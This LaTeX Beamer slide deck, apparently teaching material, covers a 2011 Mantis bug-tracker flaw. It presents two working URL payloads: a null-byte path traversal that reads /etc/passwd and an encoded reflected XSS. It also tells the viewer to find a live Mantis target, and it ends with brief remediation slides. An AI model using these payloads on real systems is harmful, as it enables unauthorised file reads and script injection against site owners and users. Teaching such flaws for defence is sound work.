\section{Mantis CSS vulnerability}

\subsection{Vulnerability identification}

	\begin{frame}\frametitle{\subsecname}
	
	\begin{columns}
	
	\begin{column}[l]{0.6\textwidth}
	
	Mantis is a web framework allowing easy bug report. 
	
	September 2011 : Security breach in the framework through none sanitate Get and Post attribute.

	\textbf{Impact} : Access to server's file, javascript execution 

	\end{column}

	\begin{column}[r]{0.4\textwidth}
	\begin{figure}
	\includegraphics[width=\textwidth]{img/mantis_logo.png}
	\caption{Mantis logo}
	\end{figure}
	\end{column}
	
	\end{columns}

	\end{frame}

\subsection{Demonstration}

	\begin{frame}\frametitle{\subsecname}
	Find a target using the mantis framework and create a fake user.
	\begin{figure}
		\includegraphics[width=\textwidth]{img/capture.png}
	\end{figure}

	\end{frame}

	\begin{frame}\frametitle{\subsecname}
		\small{\url{http://[host]/bug_actiongroup_page.php?bug_arr[]=[ISSUE_ID]&action=EXT_/../../../../../../../etc /passwd\%00}}
	\begin{figure}
	\includegraphics[width=\textwidth]{img/capture2.png}
	\end{figure}

	\end{frame}

	\begin{frame}
\small{\url{http://[host]/bug_actiongroup_ext_page.php?bug_arr\%5B0\%5D=1&action=EXT_\%22+\%2F\%3E\%3Cscript\%3Ealert\%280\%29\%3B\%3C\%2Fscript\%3E\%3Ca+name\%3D\%22\%00}}
	\begin{figure}
	\includegraphics[width=\textwidth]{img/capture4.png}
	\end{figure}
	\end{frame}

\subsection{Solution}
	\begin{frame}\frametitle{\subsecname}
		\begin{block}{Non traversal repository}
		Accessing wrong files should be intercept by the none traversal right out of the website repository.
		\end{block}
		\begin{block}{Sanitation}
		Javascript potential injection should be sanitate, each time a doubt exists. 
		\end{block}
	\end{frame}
